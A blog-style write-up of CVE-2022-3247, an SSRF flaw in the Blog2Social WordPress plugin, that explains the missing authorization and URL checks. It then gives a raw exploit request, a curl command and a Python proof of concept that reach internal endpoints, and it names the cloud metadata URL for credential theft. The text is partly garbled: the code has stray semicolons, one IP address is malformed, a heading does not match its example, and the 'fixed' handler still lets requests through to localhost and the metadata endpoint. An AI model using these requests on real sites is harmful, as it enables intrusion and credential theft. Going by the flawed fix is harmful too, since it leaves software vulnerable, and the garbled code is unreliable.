CVE-2022-3247 - Exploiting a Critical SSRF in Blog2Social WordPress Plugin (Auto Post & Scheduler)

If you use WordPress for blogging and social media automation, you might have heard of the Blog2Social plugin. It helps schedule and auto-post content to different social networks, making content management much easier.

However, a serious vulnerability, tracked as CVE-2022-3247, was discovered in Blog2Social plugin versions before 6.9.10. This flaw allows any logged-in user, even a low-level subscriber, to perform Server-Side Request Forgery (SSRF) attacks through improper AJAX endpoint authorization and lack of URL validation.

In this post, we’ll explain what went wrong in the code, how you could exploit it, and how to protect yourself.

What is the Blog2Social Plugin?

Blog2Social is a popular WordPress plugin (50,000+ active installations) that automates post scheduling and sharing across Facebook, Twitter, Instagram, and other social platforms.

What Went Wrong?

In Blog2Social versions before 6.9.10, there is an unauthorized AJAX action that handles URL requests. Two big problems here:

1. No capability check: *Any authenticated user can trigger the action, not just admins or editors.*
2. No external URL check: *The AJAX action will make HTTP requests to any URL (even internal, like localhost), opening doors for SSRF.*

SSRF (Server-Side Request Forgery)

SSRF lets an attacker make HTTP requests from the server, potentially accessing sensitive internal resources/firewalls not publicly exposed.

Let’s look at how a typical vulnerable AJAX handler might look in a WordPress plugin

add_action('wp_ajax_b2s_custom_request', 'b2s_custom_request_callback');

function b2s_custom_request_callback() {
    // Here's the missing capability check
    $url = $_POST['url'];
    $response = wp_remote_get($url); // No URL validation!
    echo wp_remote_retrieve_body($response);
    wp_die();
}

No current_user_can() or capability check – any logged-in user can access it.

- No URL whitelist/validation.

Exploit Steps

1. Login to the WordPress site as any user (subscriber/author/contributor...).

`

POST /wp-admin/admin-ajax.php?action=b2s_custom_request HTTP/1.1

Cookie: wordpress_logged_in_xxx=...

Content-Type: application/x-www-form-urlencoded

  url=http://localhost/secret-admin-endpoint

`

3. Server makes a request to http://localhost/secret-admin-endpoint and returns the response to the attacker.

#### Example: Retrieve Server’s /etc/passwd

Suppose the server is running on UNIX and has a local admin panel running at http://localhost:81/admin. You could try:

curl -b "wordpress_logged_in_xxx=..." -X POST \
  "https://targetsite.com/wp-admin/admin-ajax.php?action=b2s_custom_request"; \
  --data "url=http://localhost:81/admin"

NOTE: You could also target cloud metadata endpoints like http://169.254.169.254/latest/meta-data/ if the server is on AWS.

Here’s a simple Python PoC demonstrating the attack (requires requests)

import requests

# Fill these values
wordpres_cookie = 'wordpress_logged_in_xxx=...'
target = 'https://targetsite.com/wp-admin/admin-ajax.php';
dangerous_url = 'http://127...1:808/admin';

data = {
    'action': 'b2s_custom_request',
    'url': dangerous_url
}

headers = {
    'Cookie': wordpres_cookie
}

r = requests.post(target, data=data, headers=headers)
print(r.text)

Real-World Impact

- Data Breach: Access private/internal endpoints
- Cloud Metadata Theft: Steal AWS/GCP credentials via special URLs

Official References

- WPScan Advisory
- NIST NVD CVE-2022-3247
- Plugin website


## Mitigation / How to Protect Yourself

1. Update Blog2Social to at least v6.9.10 – Download latest

Fixed Code Example

function b2s_custom_request_callback() {
    // Only allow admins
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    $url = esc_url_raw($_POST['url']);
    // Only allow external URLs
    if (parse_url($url, PHP_URL_HOST) === $_SERVER['SERVER_NAME']) {
        wp_die('Invalid URL');
    }
    $response = wp_remote_get($url);
    echo wp_remote_retrieve_body($response);
    wp_die();
}

Conclusion

CVE-2022-3247 is a classic example of why plugin code needs strong authorization and input validation. Even “low-privilege” AJAX actions can be abused in creative and dangerous ways.

If you’re using Blog2Social, update immediately. SSRF vulnerabilities are commonly targeted and can lead to serious breaches.

*Spread the word – and always check those plugin changelogs!*


*Original research and writing by [YourName] for [Your Blog].*

Related Reading

- What is SSRF? (OWASP)
- WordPress AJAX Security Best Practices

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 17:02:00 UTC